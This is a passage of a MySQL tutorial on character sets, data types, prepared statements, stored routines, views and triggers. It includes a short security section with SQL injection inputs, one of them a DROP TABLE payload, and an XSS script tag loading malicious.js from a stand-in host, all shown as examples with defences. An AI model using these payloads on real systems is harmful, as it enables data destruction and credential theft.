In MySQL client, you can issue the command "SET NAMES 'charset'" to specify the character set used for the client/server communication. (Alternatively, you could start 'mysql' client with the --default-character-set=charset option.)

In the above situation, you need to issue "SET NAMES 'gb2312'", as your input is encoded in GB2312, which is sent to the server. The server receives the characters in GB2312, converts them into the character set defined for the column, which is UTF8, before storing them. During query, the server retrieves the characters from the columns in UTF8, convert to GB2312 (according to the SET NAMES), and send to the client in CMD, which uses codepage 936 to correctly display the text. Try the following commands:

mysql> SET NAMES 'gb2312';
Query OK, 0 rows affected (0.00 sec)
   
mysql> SHOW VARIABLES LIKE 'character\_set\_%';
+--------------------------+--------+
| Variable_name            | Value  |
+--------------------------+--------+
| character_set_client     | gb2312 |
| character_set_connection | gb2312 |
| character_set_database   | latin1 |
| character_set_filesystem | binary |
| character_set_results    | gb2312 |
| character_set_server     | latin1 |
| character_set_system     | utf8   |
+--------------------------+--------+
7 rows in set (0.00 sec)

Observe that SET NAMES affects the character_set_client, character_set_connection, and character_set_results.

Suppose that you interacts with the server via a Java program, written in Eclipse or others. You should set the encoding to UTF8, and include "SET NAMES 'utf8'" in your MySQL script.

Similarly, suppose that you are running a SQL script in batch mode or using source command in CMD, and your script in encoded in UTF8, then you should include "SET NAMES 'utf8'" in the script ("SET NAMES 'gb2312'" results in garbage inserted into the database). But to query interactively in CMD using code page 936, you need to "SET NAMES 'gb2312'" to convert UTF8 to GB2312 (cp936).

I would expect that, in CMD using codepage 65001, I could display the UTF8 column from MySQL correctly with "SET NAMES 'utf8'". But it does not work in my computer (?!?!).

Take note that you could use HEX() function to request the hex code of the characters, stored in the database.

SELECT `id`, `description`, HEX(`description`) FROM `ChineseUtf8Arena` ORDER BY `description`, `id`;

Example (Testing UTF8-encoded Chinese Characters): Read "chinese_utf8_arena.sql".

Notes on Using UTF8-Encoded Characters in Eclipse/Java
  1. Open Run Dialog ⇒ "your application" ⇒ Common Tab ⇒ Console Encoding ⇒ Other ⇒ "set it to UTF-8".
  2. Open Run Dialog ⇒ "your application" ⇒ Arguments Tab ⇒ VM Arguments ⇒ Add "-Dfile.encoding=UTF-8"; or add "-Dfile.encoding=UTF-8" to "eclipse.ini".
  3. Window Menu ⇒ General ⇒ Workspace ⇒ Text file encoding ⇒ set to "UTF-8".

Binary Data and BLOB

MySQL support both character string (a sequence of characters) and binary string (a sequence of bytes). Binary data (e.g., images and codes) are special string with character set of binary, that is, all characters are treated as binary raw bytes.

  • BINARY(n): Similar to CHAR(n), but store binary data with fixed-length of n bytes.
  • VARBINARY(n): Similar to VARCHAR(n), but store binary data of variable-length of up to n bytes.
  • TINYBLOB: up to 255 bytes
  • BLOB: up to 64KBytes
  • MEDIUMBLOB: up to 16MBytes
  • LONGBOLB: up to 4GBytes

Example: The LOAD_FILE() function, which reads from a file and returns a string, can be used to load a BLOB/TEXT field with a binary/text file.

CREATE TABLE IF NOT EXISTS `blob_arena` (
   `id`     INT UNSIGNED ZEROFILL NOT NULL AUTO_INCREMENT,
   `photo`  BLOB,
    PRIMARY KEY(`ID`)
);
   
INSERT INTO `blob_arena` (`photo`) VALUES (LOAD_FILE('d:/path/test.jpg'));

Example: Storing a thumbnail image [Refer to Rental Database Example].

ENUM

ENUM is a special string type. An ENUM (or enumeration) is a string with a value chosen from a list of allowed values (or members). The list of allowed values are defined explicitly in the column definition of the CREATE TABLE command. For example,

CREATE TABLE Shoes (
   brand           ENUM('abc', 'xyz', 'qqq');
   size            ENUM('S', 'M', 'L', 'XL', 'XXL');
   customerRating  ENUM('1', '2', '3', '4', '5');
);

The value must be a quoted string literal. Duplicate values are not allowed. NULL is allowed only if the column is declared to allow NULL. If you insert a value not in the ENUM list, an empty string ('') would be inserted, which signals an error value.

Each ENUM type is associated with an index, beginning with 1 for the first allowable value. The empty string has index of 0 (to denotes an error value). The index of NULL is NULL.

ENUM is typically represented in 16-bit, which allows 65,535 members.

Example (Testing ENUM Type):

  1. Create a table with ENUM columns. Observe that ENUM's values are quoted string literals. Numbers must be stored as quoted strings.
    CREATE TABLE IF NOT EXISTS `enum_arena` (
       `desc`            VARCHAR(50) NULL,
       `brand`           ENUM('abc', 'xyz', 'qqq') NOT NULL DEFAULT 'qqq',
       `size`            ENUM('S', 'M', 'L', 'XL', 'XXL') NOT NULL,
       `customerRating`  ENUM('5', '4', '3', '2', '1') DEFAULT NULL
    );
      
    DESCRIBE `enum_arena`;
    +----------------+------------------------------+------+-----+---------+-------+
    | Field          | Type                         | Null | Key | Default | Extra |
    +----------------+------------------------------+------+-----+---------+-------+
    | desc           | varchar(50)                  | YES  |     | NULL    |       |
    | brand          | enum('abc','xyz','qqq')      | NO   |     | qqq     |       |
    | size           | enum('S','M','L','XL','XXL') | NO   |     | NULL    |       |
    | customerRating | enum('5','4','3','2','1')    | YES  |     | NULL    |       |
    +----------------+------------------------------+------+-----+---------+-------+
  2. Insert values into ENUM fields. Check case-sensitivity and values not in the enum list. Observe that the ENUM string is NOT case-sensitive (in MySQL). Empty string (''), denoting erroneous value, would be inserted for value not in the ENUM list.
    INSERT INTO `enum_arena` 
       (`description`, `brand`, `size`)
    VALUES
       ('Valid value', 'abc', 'm'),
       ('Uppercase value', 'XYZ', 'M'),
       ('Invalid value', 'qqq', 'unknown');
       
    UPDATE `enum_arena` SET customerRating='3';
       
    SELECT * FROM `enum_arena`;
    +-----------------+-------+------+----------------+
    | description     | brand | size | customerRating |
    +-----------------+-------+------+----------------+
    | Valid value     | abc   | M    | 3              |
    | Uppercase value | xyz   | M    | 3              |
    | Invalid value   | qqq   |      | 3              |
    +-----------------+-------+------+----------------+
  3. Using numeric index as ENUM's value: Instead of the literal string value, you could also use the numeric index associated with each ENUM type. The numeric index begins at 1, for the first value is the list.
    INSERT INTO `enum_arena` VALUES
       ('Use numeric index', 'qqq', 2, 1);
       
    SELECT * FROM `enum_arena` WHERE `description`='Use numeric index';
    +-------------------+-------+------+----------------+
    | description       | brand | size | customerRating |
    +-------------------+-------+------+----------------+
    | Use numeric index | qqq   | M    | 5              |
    +-------------------+-------+------+----------------+
  4. Selecting the error records: The empty string (erroneous value) has index of 0 (error code). You could use the error index of 0 to retrieve the erroneous records as follows.
    SELECT * FROM Shirts WHERE brand=0 OR size=0 OR customerRating=0;
    +-------+------+----------------+
    | brand | size | customerRating |
    +-------+------+----------------+
    | qqq   |      | 3              |
    +-------+------+----------------+
  5. To retrieve all the allowable values of an ENUM, you could query the MySQL system database information_schema, table columns, as follows:
    SELECT column_type FROM information_schema.columns
    WHERE table_schema='test' AND table_name='enum_arena' AND column_name='brand';
    +-------------------------+
    | column_type             |
    +-------------------------+
    | enum('abc','xyz','qqq') |
    +-------------------------+

SET

SET is also a special string type. SET is similar to ENUM, but you could choose zero (empty string) or more values from the allowable values; or NULL if configured. For a SET ('a', 'b', 'c'), the valid values are '' (empty string), 'a', 'b', 'c', 'a,b', 'a,c', 'b,c' and 'a,b,c'. Commas are used to delimit multiple values, with no spaces around the commas.

A set can have a maximum of 64 members. In MySQL, a set values are stored as a 64-bit integer, with the least-significant bit corresponding to the first member. For example, for a SET ('a', 'b', 'c'), selected numeric value are:

SET member Binary Value Decimal Value
'a' 001 1
'b' 010 2
'c' 100 4
'' 000 0
'a,b,c' 111 7

Similar to ENUM, you can use the numeric value.

Example (Testing SET Data Type): Read "set_arena.sql".

[TODO] Explanation.

Date/Time

Date and time (as well as currency) are of particular interest for database applications. It is because business records often carry date/time information (e.g., orderDate, deliveryDate, paymentDate), as well as the need to time-stamp the last update of the records for auditing and security.

MySQL provides these built-in functions for getting the current date and/or time:

  • NOW(): returns the current date and time in the format of 'YYYY-MM-DD HH:MM:SS'.
  • CURDATE() (or CURRENT_DATE(), or CURRENT_DATE): returns the current date in the format of 'YYYY-MM-DD'.
  • CURTIME() (or CURRENT_TIME(), or CURRENT_TIME): returns the current time in the format of 'HH:MM:SS'.

For examples,

mysql> select now(), curdate(), curtime();
+---------------------+------------+-----------+
| now()               | curdate()  | curtime() |
+---------------------+------------+-----------+
| 2010-04-08 16:28:06 | 2010-04-08 | 16:28:06  |
+---------------------+------------+-----------+

MySQL provides these date/time data type:

  • DATETIME: stored both date and time in the format of 'YYYY-MM-DD HH:MM:SS' where the date and time are separated by a space. The valid range is '1000-01-01 00:00:00' to '9999-12-31 23:59:59'. You could apply functions NOW() or CURDATE() (time will be set to '00:00:00') on this field, but not CURTIME().
  • DATE: stored date only in the format of 'YYYY-MM-DD'. The range is '1000-01-01' to '9999-12-31'. You could use CURDATE() or NOW() (the returned time portion discarded) for this field.
  • TIME: stored time only in the format of 'HH:MM:SS'. You could use CURTIME() or NOW() (the returned date portion discarded) for this field.
  • YEAR(4|2): in 'YYYY' or 'YY'. The range of years is 1901 to 2155. Use DATE type for year outside this range. You could also use CURDATE() to retrieve the current year value for this field (month and day discarded).
  • TIMESTAMP: similar to DATETIME but stored the number of seconds since January 1, 1970 UTC (Unix-style). The range is '1970-01-01 00:00:00' to '2037-12-31 23:59:59'.
    The differences between DATETIME and TIMESTAMP are:
    1. the range,
    2. support for time zone,
    3. TIMESTAMP column could be declared with DEFAULT CURRENT_TIMESTAMP to set the default value to the current date/time. (All other data types' default, including DATETIME, must be a constant and not a function return value). You can also declared with ON UPDATE CURRENT_TIMESTAMP to capture the timestamp of the last update.

The date/time value can be entered manually as a string literal (e.g., '2010-12-31 23:59:59' for DATAETIME). MySQL will issue a warning and insert all zeros (e.g., '0000-00-00 00:00:00' for DATAETIME), if the value of date/time to be inserted is invalid or out-of-range. '0000-00-00' is called a "dummy" date.

Example (Testing DATE/TIME Data Types):

  1. Create a table with various date/time columns. Only the TIMESTAMP column can have the DEFAULT and ON UPDATE as CURRENT_TIMESTAMP.
    CREATE TABLE IF NOT EXISTS `datetime_arena` (
       `desc`        VARCHAR(50)  DEFAULT NULL,
       `cDateTime`   DATETIME     DEFAULT '0000-00-00 00:00:00',
       `cDate`       DATE         DEFAULT '0000-00-00',
       `cTime`       TIME         DEFAULT '00:00:00',
       `cYear`       YEAR         DEFAULT '0000',
       `cYear2`      YEAR(2)      DEFAULT '00',
       `cTimeStamp`  TIMESTAMP    DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP
    );
       
    DESCRIBE `datetime_arena`;
    +-------------+-------------+------+-----+---------------------+-----------------------------+
    | Field       | Type        | Null | Key | Default             | Extra                       |
    +-------------+-------------+------+-----+---------------------+-----------------------------+
    | description | varchar(50) | YES  |     | NULL                |                             |
    | cDateTime   | datetime    | YES  |     | 0000-00-00 00:00:00 |                             |
    | cDate       | date        | YES  |     | 0000-00-00          |                             |
    | cTime       | time        | YES  |     | 00:00:00            |                             |
    | cYear       | year(4)     | YES  |     | 0000                |                             |
    | cYear2      | year(2)     | YES  |     | 00                  |                             |
    | cTimeStamp  | timestamp   | NO   |     | CURRENT_TIMESTAMP   | on update CURRENT_TIMESTAMP |
    +-------------+-------------+------+-----+---------------------+-----------------------------+
  2. Insert values manually using string literals.
    INSERT INTO `datetime_arena` 
       (`description`, `cDateTime`, `cDate`, `cTime`, `cYear`, `cYear2`)
    VALUES 
       ('Manual Entry', '2001-01-01 23:59:59', '2002-02-02', '12:30:30', '2004', '05');
       
    SELECT * FROM `datetime_arena` WHERE description='Manual Entry';
    +--------------+---------------------+------------+----------+-------+--------+---------------------+
    | description  | cDateTime           | cDate      | cTime    | cYear | cYear2 | cTimeStamp          |
    +--------------+---------------------+------------+----------+-------+--------+---------------------+
    | Manual Entry | 2001-01-01 23:59:59 | 2002-02-02 | 12:30:30 |  2004 |     05 | 2010-04-08 14:44:37 |
    +--------------+---------------------+------------+----------+-------+--------+---------------------+
  3. Checking the on-update for TIMSTAMP.
    UPDATE `datetime_arena` SET `cYear2`='99' WHERE description='Manual Entry';
       
    SELECT * FROM `datetime_arena` WHERE description='Manual Entry';
    +--------------+---------------------+------------+----------+-------+--------+---------------------+
    | description  | cDateTime           | cDate      | cTime    | cYear | cYear2 | cTimeStamp          |
    +--------------+---------------------+------------+----------+-------+--------+---------------------+
    | Manual Entry | 2001-01-01 23:59:59 | 2002-02-02 | 12:30:30 |  2004 |     99 | 2010-04-08 14:44:48 |
    +--------------+---------------------+------------+----------+-------+--------+---------------------+
  4. Insert values using MySQL built-in functions now(), curdate(), curtime().
    INSERT INTO `datetime_arena` 
       (`description`, `cDateTime`, `cDate`, `cTime`, `cYear`, `cYear2`)
    VALUES
       ('Built-in Functions', now(), curdate(), curtime(), now(), now());
       
    SELECT * FROM `datetime_arena` WHERE description='Built-in Functions';
    +--------------------+---------------------+------------+----------+-------+--------+---------------------+
    | description        | cDateTime           | cDate      | cTime    | cYear | cYear2 | cTimeStamp          |
    +--------------------+---------------------+------------+----------+-------+--------+---------------------+
    | Built-in Functions | 2010-04-08 14:45:48 | 2010-04-08 | 14:45:48 |  2010 |     10 | 2010-04-08 14:45:48 |
    +--------------------+---------------------+------------+----------+-------+--------+---------------------+
  5. Insert invalid or out-of-range values. MySQL replaces with all zeros.
    INSERT INTO `datetime_arena` 
       (`description`, `cDateTime`, `cDate`, `cTime`, `cYear`, `cYear2`)
    VALUES
       ('Error Input', '2001-13-31 23:59:59', '2002-13-31', '12:61:61', '99999', '999');
       
    SELECT * FROM `datetime_arena` WHERE description='Error Input';
    +-------------+---------------------+------------+----------+-------+--------+---------------------+
    | description | cDateTime           | cDate      | cTime    | cYear | cYear2 | cTimeStamp          |
    +-------------+---------------------+------------+----------+-------+--------+---------------------+
    | Error Input | 0000-00-00 00:00:00 | 0000-00-00 | 00:00:00 |  0000 |     00 | 2010-04-08 14:46:10 |
    +-------------+---------------------+------------+----------+-------+--------+---------------------+
  6. An useful built-in function INTERVAL can be used to compute a future date, e.g.,
    SELECT `cDate`, `cDate` + INTERVAL 30 DAY, `cDate` + INTERVAL 1 MONTH FROM `datetime_arena`;
    +------------+---------------------------+----------------------------+
    | cDate      | `cDate` + INTERVAL 30 DAY | `cDate` + INTERVAL 1 MONTH |
    +------------+---------------------------+----------------------------+
    | 2002-02-02 | 2002-03-04                | 2002-03-02                 |
    | 2010-04-08 | 2010-05-08                | 2010-05-08                 |
    | 0000-00-00 | NULL                      | NULL                       |
    +------------+---------------------------+----------------------------+

Example (Creation and Last Update TIMESTAMP): In MySQL, you can have only one TIMESTAMP column with DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP. To maintain both the creation and last updated timestamp, set the creation column to default 0 and insert a NULL to get the CURRENT_TIMESTAMP.

CREATE TABLE timestamp_arena (
   `desc` VARCHAR(30),
   created TIMESTAMP DEFAULT 0,
   last_updated TIMESTAMP DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP);

-- INSERT NULL to created which results in CURRENT_TIMESTAMP
INSERT INTO timestamp_arena VALUE ('Created', NULL, NULL);

SELECT * FROM timestamp_arena;
+---------+---------------------+---------------------+
| desc    | created             | last_updated        |
+---------+---------------------+---------------------+
| Created | 2012-10-29 20:22:06 | 2012-10-29 20:22:06 |
+---------+---------------------+---------------------+

UPDATE timestamp_arena SET `desc`='Updated';

SELECT * FROM timestamp_arena;
+---------+---------------------+---------------------+
| desc    | created             | last_updated        |
+---------+---------------------+---------------------+
| Updated | 2012-10-29 20:22:06 | 2012-10-29 20:23:04 |
+---------+---------------------+---------------------+

Type Casting

To parse a string (of digits) into numbers, use function CAST(... AS type) or +0. For example,

mysql> SET @aStr = '1234';
   
mysql> SELECT @aStr, @aStr+0, CAST(@aStr AS UNSIGNED);
+-------+---------+-------------------------+
| @aStr | @aStr+0 | CAST(@aStr AS UNSIGNED) |
+-------+---------+-------------------------+
| 1234  |    1234 |                    1234 |
+-------+---------+-------------------------+

[TODO] more

Spatial Data Types

  • POINT: A point in (x, y) pair.
  • LINESTRING:
  • POLYGON:
  • GEOMETRY:
  • MULTIPOINT:
  • MULTILINESTRING:
  • MULTIPOLYGON:
  • GEOMETRYCOLLECTION:

Prepared Statement

SQL Injection Attack

Reference: Steve Friedl's "SQL Injection Attacks by Example".

Suppose that your application prompts user for his username/password and intends to issue the following SQL SELECT:

SELECT password FROM users WHERE user = 'username';

A malicious user may enter "xxxx' OR '1' = '1", resulted in:

SELECT password FROM user WHERE user = 'xxxx' OR '1'='1';   // Show all users

What if you have a DELETE command as follows. All the records in the table would be deleted.

DELETE FROM users WHERE user = 'username';

In some situations, you may execute multiple SQL statements, separating them by commas. The malicious user may enter "xxxx'; DROP TABLE users; -- ", where -- (or #) is MySQL's end-of-line comment. This results in:

SELECT password FROM user WHERE user = 'xxxx'; DROP TABLE users; -- ';

The solutions are:

  1. Always check the input before plugging it into the SQL statement. Replace quotes with their escape characters, i.e., ' as \', and " as \".
  2. Grant the least authority necessary to carry out the task, e.g., grant only SELECT (and disallow DELETE, INSERT or even UPDATE - and certainly no DROP TABLE and DROP DATABASE).
  3. Use a Prepared Statement (as below) or Stored procedure to take the input parameters.

Prepared Statement

A prepared statement (or parameterized statement) contains placeholders for input parameters. You can reuse the same prepared statement many times, with different inputs. Prepared statements are often pre-compiled, which are more efficient than the normal statements.

The steps in using prepared statements are:

  1. Allocate a prepared statement, with placeholders indicated as ?.
  2. Set the inputs.
  3. Execute the prepared statement with the inputs (for the placeholders).
  4. Repeat Step 2 and 3 for another execution.
  5. Deallocate the prepared statement.
Example
PREPARE pstmt FROM 'SELECT * FROM products WHERE productCode = ? AND quantity <= ?';
SET @productCode = 'PEC';                    -- Set variables
SET @quantity = 200;
EXECUTE pstmt USING @productCode, @quantity;
    -- list the variables in the same order as the ?'s
 
-- Another invocation with different inputs
SET @quantity = 500;
EXECUTE pstmt USING @productCode, @quantity;
 
DEALLOCATE PREPARE pstmt;
Example
SET @query = 'INSERT INTO products VALUES (?, ?, ?, ?, ?)';
PREPARE pstmt FROM @query;
SET @productID = NULL;
SET @productCode = 'PEC';
SET @name = 'Pencil HB';
SET @quantity = 500;
SET @price = 0.49;
EXECUTE pstmt USING @productID, @productCode, @name, @quantity, @price;  
    -- list the variables in the same order as the ?'s
DEALLOCATE PREPARE pstmt;

HTML Injection Attack

There is another similar injection attack called HTML Injection (or Cross-site Scripting or XSS), which may expose the privacy and protection of a web user, but not so much on the security of the system.

Suppose that you ask users to leave their comments. A malicious user may enter a <script> statement. For example,

<script src='http://xxx.com/malicious.js'></script><script>run();</script>

If another user view the page with the comment, the script will be invoked. The malicious script could steal information from your web browser, such as username and password stored in your browser's cookies.

The solution is always replacing the special HTML characters with their HTML entities (< as &lt;, > as &gt;, " as &quot; and & as &amp;) before echoing back to the user.

Stored Objects and Programs

A stored database object is a set of SQL statements that are stored in the server for subsequent invocation. MySQL stored objects include:

  1. User-Defined Functions & Stored Procedures: Collectively known as stored routines, that contain a set of SQL statements stored in the server, for subsequent invocation.
    A function takes a set of parameters, performs the programmed operations, and returns a result to the caller. In addition to the MySQL built-in functions, you can write your own functions using SQL statements. To invoke a function, use functionName(parameters). You can store the return value in a variable, e.g., SET @variableName := functionName(parameters); or SELECT functionName(parameters).
    A procedure is similar to a function, except that it does not return a value. However, you could use the parameters to pass values between the caller and the procedure by declaring the direction of the parameters as IN, OUT, or INOUT (whereas all parameters for function are restricted to IN). Use CALL statement to invoke a procedure, in the form of CALL procedureName(parameters).
  2. Triggers: A trigger is an event handler that is activated upon the occurrence of a particular event, e.g., BEFORE|AFTER INSERT, DELETE, UPDATE. A trigger is associated with a table. For example, you can use a BEFORE INSERT trigger to set the creation TIMESTAMP of the record; or BEFORE DELETE trigger to perform a backup.
  3. Events: An event is a scheduled task, which runs at the scheduled date/time, and could be recurring.
  4. Views: A view is a stored query. It is a virtual table with no real data, which is often used to limit the information available to a less-privilege user or produce additional derived columns (such as total price).

A stored object is associated with a database. You can invoke a routine not belonging to the current database by qualifying the database name, e.g. test.myFunction(), or CALL test.myProcedure(). All stored objects for a database are removed, when the database is dropped.

You can use CREATE|ALTER|DROP FUNCTION|PROCEDURE|TRIGGER|EVENT|VIEW, to create, alter, or delete the stored objects.

Before discussing the stored objects, we need to look at the MySQL syntax for programming stored objects.

Compound Statement

A compound statement comprises multiple statements, treated as a unit. A compound statement is enclosed within BEGIN ... END. Each of the statements is terminated with ';' (called statement delimiter). As the "statement delimiter" crashes with the "end-of-statement" delimiter of the mysql client (which signals the client to send the statement to the server for processing), we need to use DELIMITER command to temporarily change the "end-of-statement" delimiter for the mysql client. For example,

-- Change the "end-of-statement" delimiter from ';' to '//'
DELIMITER //
   
CREATE PROCEDURE procedureName (parameters)
BEGIN
   -- Declaring local variables having scope within BEGIN ... END.
   DECLARE variableName1 [, variablesName2 ...] type [DEFAULT value];
   statement1;
   ....
   statementN;
END//   -- end-of-statement for CREATE PROCEDURE

-- Restore the "end-of-statement" delimiter to default of ';'
DELIMITER ;

Local Variables

Within a compound statement enclosed by BEGIN ... END, we can declare local variables using DECLARE statement, specifying its name, type and optional default value. The scope of the local variables is within the BEGIN ... END. We can use the SET command to assign value to the local variables.

We can also use "SELECT ... INTO variableName1 [, variableName2 ...]" to assign a value to local variable(s) from a query. The "SELECT ... INTO" should return a single row. You may use "LIMIT 1" to limit the output of SELECT to a single row with proper selection criteria and ordering.

Flow Control

MySQL supports the IF, CASE, ITERATE, LEAVE LOOP, WHILE, and REPEAT flow control constructs for stored programs.

-- IF-THEN-ELSE
IF condition THEN trueStatements;
[ELSEIF condition THEN trueStatements;]
[ELSE elseStatements;]
END IF;
Example
 
 
 
 
-- CASE-WHEN with value
CASE caseValue
  WHEN value1 THEN value1Statements;
  WHEN value2 THEN value2Statements;
  ......
  [ELSE elseStatements;]
END CASE;
Example
 
 
 
 
 
 
-- CASE-WHEN with conditions
CASE
  WHEN condition1 THEN condition1Statements;
  WHEN condition2 THEN condition2Statements;
  .......
  [ELSE elseStatements;]
END CASE;
Example
 
  
 
 
 
-- REPEAT statements UNTIL the condition is true
REPEAT falseStatements;
  UNTIL condition
END REPEAT;
Example
 
 
-- WHILE condition is true DO statements
WHILE condition 
  DO trueStatements;
END WHILE;
Example
 
 
 
-- Repeat statements
[begin_label:] LOOP 
   statements;
END LOOP [end_label];
Example
 
 
 
-- "break" the flow control construct identified by label
label: LOOP
   ......
   LEAVE label;   -- "Break" the block identified by label
   ......
END LOOP
Example
 
 
 
 
 
-- "continue" to the flow control construct identified by label
label: LOOP
   ......
   ITERATE label;
   ......
END LOOP
Example
 
 
 
 
 

The following flow-control functions are available:

-- If the condition is true, return trueResult;
-- otherwise, return falseResult.
IF(condition, trueResult, falseResult)
Example
 
 
-- If value is NULL, return nullResult;
-- otherwise, return value.
IFNULL(value, nullResult)
Example
 
 
-- If value is NULL, return 1 (true);
-- otherwise return 0 (false).
ISNULL(value)
Example
 
 
-- If value1 equals to value2, return NULL;
-- otherwise, return value1.
NULLIF(value1, value2)
Example
 
 

Stored Procedures

Syntax:

CREATE PROCEDURE procedureName (parameter[, ...])
  statement

parameter:
  [IN|OUT|INOUT] parameterName parameterType

You can use parameters to pass data into and receive data from a stored procedure by declaring the direction of the parameters as IN, OUT, or INOUT. The received data are often placed in user-defined variables.

You can use a compound statement, consisting of multiple statements, as the body of the CREATE PROCEDURE. A compound statement is enclosed between BEGIN and END. As each of the statements is terminated by semi-colon, which crashes with MySQL statement terminator, we have to use DELIMITER to change the MySQL's delimiter.

Example:

-- Use this table for testing stored procedure
CREATE TABLE IF NOT EXISTS products (
   productID    INT UNSIGNED  NOT NULL AUTO_INCREMENT,
   productCode  CHAR(3)       NOT NULL DEFAULT '',
   name         VARCHAR(30)   NOT NULL DEFAULT '',
   quantity     INT UNSIGNED  NOT NULL DEFAULT 0,
   price        DECIMAL(7,2)  NOT NULL DEFAULT 99999.99,
   PRIMARY KEY  (productID)
);
 
INSERT INTO products VALUES 
   (1001, 'PEN', 'Pen Red',    5000, 1.23),
   (1002, 'PEN', 'Pen Blue',   8000, 1.25),
   (1003, 'PEN', 'Pen Black',  2000, 1.25),
   (1004, 'PEC', 'Pencil 2B', 10000, 0.48),
   (1005, 'PEC', 'Pencil 2H',  8000, 0.49); 
SELECT * FROM `products`;

-- Define a simple procedure without parameter
-- The procedure has only one statement
CREATE PROCEDURE simpleProc()
SELECT * FROM products;

-- Use CALL to invoke the procedure
CALL simpleProc;

-- Define a procedure with a compound statement
-- The compound statement uses ; which crash with MySQL delimiter.
-- Hence, we change the MySQL delimiter temporary
DELIMITER //
CREATE PROCEDURE compoundProc()
BEGIN  -- A compound statement is enclosed within BEGIN and END
  SELECT * FROM products;
  SELECT NOW();
END//  -- End of MySQL CREATE PROCEDURE statement
DELIMITER ;  -- Restore MySQL delimiter
 
-- Invoke the procedure
CALL compoundProc;

-- Define stored procedure with parameters
DELIMITER //

-- Find the products with `quantity` less than the given `reorderLevel`,
-- and return the total cost to replenish in `cost`
-- The parameters could be declared as IN, OUT or INOUT
CREATE PROCEDURE reorderCost (IN reorderLevel INT, OUT cost DECIMAL(8,2))
BEGIN
  SELECT IFNULL(sum(price*(reorderLevel-quantity)), 0) INTO cost
  FROM products
  WHERE quantity < reorderLevel;
END//

DELIMITER ;     -- restore the default delimiter ';'
 
-- Call the stored procedure. Pass in input parameter, and receive output in a variable
CALL reorderCost(5000, @cost);
   
-- Show the return value
SELECT @cost;
+--------+
| @cost  |
+--------+
| 353.00 |
+--------+
 
-- Test IFNULL() in the procedure
CALL reorderCost(1000, @cost);

SELECT @cost;
+-------+
| @cost |
+-------+
|  0.00 |
+-------+

You can optionally use "DEFINER" and "SQL SECURITY" to control user access to the stored procedure:

CREATE
  DEFINER=CURRENT_USER|'user'@'host'
  SQL SECURITY DEFINER|INVOKER
  PROCEDURE procedureName (parameter[, ...])
    statements

If SQL SECURITY DEFINER is used, the procedure executes with the privileges of DEFINER user no matter which user invokes it. If SQL SECURITY INVOKER is used, the procedure executes with the privileges of the user who invoke it. The default DEFINER is the current user.

User-Defined Functions

Syntax:

CREATE FUNCTION functionName (parameter[, ...]) RETURNS returnType
  statements;
  RETURN value;

A function returns a scalar value, via the statement RETURN. All parameters are IN parameters.

Example:

DELIMITER //
CREATE FUNCTION sayHello (name VARCHAR(20)) RETURNS VARCHAR(30)
BEGIN
   RETURN CONCAT('Hello, ', name, '!');
END//
DELIMITER ;

To invoke the function, use functionName(parameters):

mysql> SELECT sayHello('peter');
+-------------------+
| sayHello('peter') |
+-------------------+
| Hello, peter!     |
+-------------------+

Example:

// Define FUNCTION
DROP FUNCTION IF EXISTS reorderCostFn;
DELIMITER //

-- Find the products with `quantity` less than the given `reorderLevel`,
-- and return the total cost to replenish
CREATE FUNCTION reorderCostFn (reorderLevel INT) RETURNS DECIMAL(8,2)
BEGIN
  SELECT IFNULL(sum(price*(reorderLevel-quantity)), 0) INTO @cost
  FROM products 
  WHERE quantity < reorderLevel;
 
  RETURN @cost;
END//

DELIMITER ;     -- restore the default delimiter ';'
   
-- Invoke the function
SELECT reorderCostFn(5000) AS Cost;
+---------+
| Cost    |
+---------+
| 3750.00 |
+---------+

Views

A view is a preset query stored in a database. A view could be useful for improved security by restricting the data available to less-privilege users; or producing derived column (such as total prices from unit prices).

Syntax:

CREATE VIEW viewName (columnList) AS selectStatement

Example: Our products table has 5 columns. We can create a view to restrict certain users to two columns, name and price, as follows:

-- Create a VIEW which shows only selected columns
DROP VIEW IF EXISTS products_view;

CREATE VIEW products_view (Name, Price)
AS
SELECT CONCAT(productCode, ' - ', name), price FROM products;

DESCRIBE products_view;
   
SELECT * FROM products_view;
+-----------------+-------+
| Name            | Price |
+-----------------+-------+
| PEN - Pen Red   |  1.23 |
  ......
 
-- Create another VIEW with a derived column
DROP VIEW IF EXISTS products_total_view;
 
CREATE VIEW products_total_view
AS
SELECT
   CONCAT(productCode, ' - ', name) AS Name,
   quantity AS Quantity,
   price AS Price,
   quantity*price AS Total
FROM products;
 
SELECT * FROM products_total_view;
+-----------------+----------+-------+----------+
| Name            | Quantity | Price | Total    |
+-----------------+----------+-------+----------+
| PEN - Pen Red   |     5000 |  1.23 |  6150.00 |
| PEN - Pen Blue  |     8000 |  1.25 | 10000.00 |
 ......

Triggers

A trigger is a event handler that executes in response to an event. A trigger is associated with a table. Three types of table events can activate a trigger: DELETE (include REPLACE), INSERT (include LOAD DATA and REPLACE), and UPDATE. You can set the trigger to execute BEFORE or AFTER the table event.

Syntax:

CREATE TRIGGER triggerName 
  {AFTER|BEFORE} {DELETE|INSERT|UPDATE}
ON tableName FOR EACH ROW 
  statements

You can refer to columns in the table associated with the trigger by using the aliases OLD and NEW:

  • For DELETE and UPDATE: OLD.columnName refers to a column of an existing row before it is updated or deleted.
  • For INSERT and UPDATE: NEW.columnName refers to the column of a new row to be inserted or an existing row after it is updated. To set a column value for INSERT, you need to use a BEFORE INSERT trigger and set the via via NEW.columnName. See example below.

Example: Save the row in a backup table before the row is deleted.

-- Create the backup table for persons (See earlier example)
CREATE TABLE backup_persons (
   `personID`         INT UNSIGNED  NOT NULL,
   `firstName`        VARCHAR(20)   NOT NULL,
   `lastName`         VARCHAR(20)   NOT NULL,
   `datetimeDeleted`  DATETIME      NOT NULL,
    PRIMARY KEY(`personID`)
);
 
-- Define a trigger "before" a row is "deleted" from table persons
DELIMITER //
CREATE TRIGGER archiveEmployees
BEFORE DELETE ON persons FOR EACH ROW
BEGIN
  INSERT INTO backup_persons
  -- OLD is a system-provided alias referring to the existing columns
  --  before update or delete.
  VALUES (OLD.personID, OLD.firstName, OLD.lastName, NOW());
END//

DELIMITER ;

To test the trigger:

INSERT INTO persons VALUE (NULL, 'Peter', 'Johonson');
   
DELETE FROM persons WHERE firstName='Peter' AND lastName = 'Johonson';
   
SELECT * FROM persons WHERE firstName='Peter' AND lastName = 'Johonson';
Empty set (0.00 sec)
   
SELECT * FROM backup_persons WHERE firstName='Peter' AND lastName = 'Johonson';
